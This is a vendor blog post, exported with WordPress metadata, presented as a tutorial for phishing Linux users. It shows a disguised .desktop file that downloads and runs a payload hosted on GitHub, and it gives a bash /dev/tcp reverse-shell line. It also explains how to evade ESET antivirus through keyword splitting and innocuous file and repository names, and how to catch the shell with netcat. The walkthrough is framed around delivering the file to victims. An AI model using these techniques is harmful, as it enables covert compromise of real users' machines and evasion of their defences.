{"id":59348,"date":"2022-11-02T16:16:44","date_gmt":"2022-11-02T08:16:44","guid":{"rendered":"https:\/\/version-2.com\/?p=59348"},"modified":"2023-07-24T18:42:07","modified_gmt":"2023-07-24T10:42:07","slug":"phishing-linux-users-with-zero-detection","status":"publish","type":"post","link":"https:\/\/version-2.com\/en\/2022\/11\/phishing-linux-users-with-zero-detection\/","title":{"rendered":"Phishing Linux Users with Zero Detection!"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"59348\" class=\"elementor elementor-59348\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"color: #000000;\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\" width=\"1125\" height=\"787\" \/><\/span><\/p><div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><h1><span style=\"color: #000000;\"><strong>Introduction<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">All the phishing campaigns that attackers perform are on windows users and that&#8217;s normal as\u00a0<code>Windows<\/code>\u00a0widely used operating system. But, we will see how to perform phishing on\u00a0<code>Linux<\/code>users effectively &amp; undetectable through the\u00a0<code>.desktop \"Desktop Entry\"<\/code>\u00a0file and deliver our payload through trusted websites such as (<code>Github<\/code>&amp;<code>Gitlab<\/code>). Also, We will run our\u00a0<code>Destop Entry<\/code>\u00a0on\u00a0<code>Ubuntu<\/code>\u00a0machine and the\u00a0<code>Eset nod32<\/code>\u00a0Anti-Virus is installed &amp; running.<\/span><\/p><h1><span style=\"color: #000000;\"><strong>What is .desktop &#8220;Desktop Entry&#8221; file ?<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">Basically,\u00a0<code>.desktop<\/code>\u00a0file is like a shortcut file in\u00a0<code>windows<\/code>\u00a0for\u00a0<code>Linux<\/code>\u00a0, Therefore, you can use it to indicate to an application and once the\u00a0<code>.desktop<\/code>\u00a0file executed it will run the application that the file points to it. Now, We can create a custom\u00a0<code>.desktop<\/code>\u00a0file and make it indicate to the\u00a0<code>\/bin\/sh<\/code>\u00a0which is the Linux shell and execute commands to download the payload, or just connect out the target to our server &amp; receive a shell.<\/span><\/p><h1><span style=\"color: #000000;\"><strong>Desktop Entry Basics<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">We gonna cover some basic syntax and don&#8217;t worry it&#8217;s not complicated at all &amp; it&#8217;s very simple. So, as any code you have to define the start point in the file and we doing it using\u00a0<code>[Desktop Entry]<\/code>\u00a0as the first line into the file (<code>You can create a file and name it name.desktop and start writing into it<\/code>) . The\u00a0<code>Desktop Entry<\/code>\u00a0files syntax basically can be considered as a key &amp; value (e.x:<code>Name=AppName \"Key=Value\"<\/code>\u00a0). The\u00a0<code>Key<\/code>\u00a0is defined before in the\u00a0<code>Desktop Entry<\/code>\u00a0syntax and each one has a specific role &amp; the value is given by the user.<\/span><\/p><p><span style=\"color: #000000;\">Now, let&#8217;s discover the Keys:<\/span><\/p><p><span style=\"color: #000000;\"><code>Name<\/code>: Set the name of the file.<\/span><\/p><p><span style=\"color: #000000;\"><code>Type<\/code>: The type of the\u00a0<code>Desktop Entry<\/code>\u00a0(The file type could be 3 things\u00a0<code>Application<\/code>,<code>Link<\/code>and<code>Directory<\/code>)<\/span><\/p><p><span style=\"color: #000000;\">each\u00a0<code>Type<\/code>\u00a0of a\u00a0<code>Desktop Entry<\/code>\u00a0takes different\u00a0<code>Keys<\/code>. The\u00a0<code>Application<\/code>\u00a0takes a path to the program will be run, Also it can carry arguments related to the program (e.x:<code>\/bin\/sh -c \"touch \/tmp\/testfile\"<\/code>).<\/span><\/p><p><span style=\"color: #000000;\"><code>Version<\/code>: The Version of the Entry file.<\/span><\/p><p><span style=\"color: #000000;\"><code>Icon<\/code>: Desktop File icon to display.<\/span><\/p><p><span style=\"color: #000000;\"><code>Exec<\/code>: The path of the program to run (<code>including the arguments as well<\/code>) .<\/span><\/p><p><span style=\"color: #000000;\">We will not be using a lot of\u00a0<code>keys<\/code>\u00a0for our file. If you wanna know more\u00a0<code>keys<\/code>&amp; more details you can check it out from\u00a0<a style=\"color: #000000;\" href=\"https:\/\/specifications.freedesktop.org\/desktop-entry-spec\/desktop-entry-spec-latest.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Here<\/a>.<\/span><\/p><p><span style=\"color: #000000;\">Now, Before we start creating our file, Let&#8217;s get our payload ready on payload ready on github.<\/span><\/p><h1><span style=\"color: #000000;\"><strong>Host the payload on github &amp; gitlab<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">As github and gitlab are a trusted organization we will be able to make sure that our payload will be delivered successfully (Note:<code>Maybe github or gitlab be blocked in some organizations \"Rarely happen\"<\/code>) . Now, i am gonna use\u00a0<code>github\u00a0<\/code>for explaining but at all you can use\u00a0<code>github<\/code>or<code>gitlab<\/code>. First thing is to create a new\u00a0<em>repository<\/em>\u00a0and give it a non-suspicious name (e.x: don&#8217;t use\u00a0<code>Myshell<\/code>,<code>Payload<\/code>,\u00a0<code>reverse<\/code>,<code>bind<\/code>\u00a0and so on) instead use normal and known names &#8220;Not just for the repository. But, also for our payload name&#8221; and also for the file extension. As we are targeting\u00a0<code>Linux<\/code>\u00a0users, We can run the\u00a0<code>payload<\/code>\u00a0from the shell as the following\u00a0<code>.\/app.ext<\/code>\u00a0no matter the extension is\u00a0<code>elf<\/code>\u00a0or whatever.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yh7yqx2p4v0kpl6mzga8p3.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">I named the\u00a0<em>repository<\/em>\u00a0<code>VsocietySolution<\/code>\u00a0&amp; A short description. Then, created the\u00a0<code>repository<\/code>\u00a0. Now, i will create a new shell file which contains some scripting codes, including\u00a0<code>bash -i &gt;&amp; \/dev\/tcp\/$Nothin\/$Nothing 0&gt;&amp;1<\/code>\u00a0which basically run interactive bash shell and connect to us through the\u00a0<code>\/dev\/tcp<\/code>\u00a0(you can use\u00a0<code>udp<\/code>\u00a0instead of\u00a0<code>tcp<\/code>) based on what type of protocols you listen on for the connection.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yh8kqa2p560kpl0n6cd1dc.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Here you can see the file and the code. So, what i did here is to little obfuscate in the code and it&#8217;s by sperate the\u00a0<code>words<\/code>\u00a0that can be detected by the anti-virus (e.x:<code>bash<\/code>,<code>\/dev\/tcp<\/code>\u00a0or even if the AV performing some regex to detect if there is any IP address). Also, obfuscated the file name itself by changing it to\u00a0<code>access.log<\/code>.<\/span><\/p><h1><span style=\"color: #000000;\"><strong>Create\u00a0<\/strong><code>.desktop<\/code>\u00a0File<\/span><\/h1><p><span style=\"color: #000000;\">It&#8217;s the time to create our malicious\u00a0<code>.desktop<\/code>\u00a0file to deliver it to the victim and as we understand the syntax we will be able to create it easily. Now, create a new file and name it\u00a0<code>any.desktop<\/code>. Then, open it with any text editor you have.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yh96s32p270kmifcv3de9h.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">I named the file\u00a0<code>vsociety.desktop<\/code>and as you can see it says the file is\u00a0<code>Unnamed<\/code>\u00a0we will now add a name for the file and the full code.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yh9q4y2p650kpl7926c3w4.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Here I made the name\u00a0<code>Note.txt<\/code>, Then\u00a0<code>Exec<\/code>\u00a0will execute the\u00a0<code>sh<\/code>\u00a0Linux shell and\u00a0<code>-c<\/code>\u00a0argument is for\u00a0<code>command<\/code>\u00a0to be executed by the Linux shell. So, the command that gonna be executed will go to\u00a0<code>tmp<\/code>\u00a0directory and then download our shell script using\u00a0<code>wget<\/code>\u00a0(<code>wget\u00a0<\/code>mostly installed by default on linux systems) Then, it will give the execute permission for our file which is\u00a0<code>access.log<\/code>\u00a0and after that will execute it. At the last line, I choose an Icon to use. But,\u00a0<code>debian<\/code>\u00a0Linux actually set an icon automatically according to file name. And you can find the icon you want to set for the file in the system. Just use\u00a0<code>locate icon | grep text<\/code>\u00a0it will locate files\/paths with the\u00a0<code>icon<\/code>\u00a0word and filter out the one that has the word\u00a0<code>txt<\/code>.<\/span><\/p><h1><span style=\"color: #000000;\"><strong>Getting a shell<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">Now, we will try our malicious file on an updated ubuntu box with\u00a0<code>Eset nod32<\/code>\u00a0Anti-Virus Installed and we will bypass it. First of all let&#8217;s start our\u00a0<code>netcat<\/code>listener on our Attacker box, In the shell script file we set 8080 as the connection port. So, we will start our listener on port 8080.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhah4q2p6k0kplas6z59mp.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Our Anti-Virus is running and we will run our file.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhc5532p5u0kmi64q84e98.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">We executed the\u00a0<code>Desktop Enry<\/code>\u00a0file and as the following:<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhcyoy2p6j0kmi8ngffm4a.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">As can see that our\u00a0<code>access.log<\/code>\u00a0file downloaded and is in the\u00a0<code>\/tmp<\/code>\u00a0directory as we configured the command inside our\u00a0<code>.desktop<\/code>\u00a0file. And the file is executed successfully and we got a shell on the attacker box.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhdao02pa90kpl1bl64778.png\" \/><\/span><\/p><h1><span style=\"color: #000000;\"><strong>Conclusion<\/strong><\/span><\/h1><p><span style=\"color: #000000;\">This was a very easy way to perform phishing on linux users easily without need to develop any malware or having ours in doing research to see an effective way without getting detected, At all you can use the same way to get a shell and after that you could upload your\u00a0<code>beacon<\/code>\u00a0and don&#8217;t forget to use non-suspicious names &amp; obfuscation.<\/span><\/p><p><span style=\"color: #000000;\">#linux #phishing #attack #tutorial<\/span><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p class=\"wp-block-paragraph\"><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction All the phishing campaigns that attackers  [&hellip;]<\/p>\n","protected":false},"author":143524195,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_wpcom_ai_launchpad_first_post":false,"_jetpack_feature_clip_id":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_post_was_ever_published":false},"categories":[476,488,61],"tags":[477,489],"class_list":["post-59348","post","type-post","status-publish","format-standard","hentry","category-vrx","category-488","category-press-release","tag-vrx","tag-489"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Phishing Linux Users with Zero Detection! - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Phishing Linux Users with Zero Detection! - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction All the phishing campaigns that attackers [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2022-11-02T08:16:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-24T10:42:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"version2hk\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"version2hk\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/11\\\/phishing-linux-users-with-zero-detection\\\/\"},\"author\":{\"name\":\"version2hk\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\"},\"headline\":\"Phishing Linux Users with Zero Detection!\",\"datePublished\":\"2022-11-02T08:16:44+00:00\",\"dateModified\":\"2023-07-24T10:42:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/11\\\/phishing-linux-users-with-zero-detection\\\/\"},\"wordCount\":944,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2022\"],\"articleSection\":[\"vRx\",\"2022\",\"Press Release\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/11\\\/phishing-linux-users-with-zero-detection\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection\",\"name\":\"Phishing Linux Users with Zero Detection! - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\",\"datePublished\":\"2022-11-02T08:16:44+00:00\",\"dateModified\":\"2023-07-24T10:42:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/phishing-linux-users-with-zero-detection#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Phishing Linux Users with Zero Detection!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\",\"name\":\"version2hk\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"caption\":\"version2hk\"},\"sameAs\":[\"http:\\\/\\\/version2xfortcom.wordpress.com\"],\"url\":\"https:\\\/\\\/version-2.com\\\/en\\\/author\\\/version2hk\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Phishing Linux 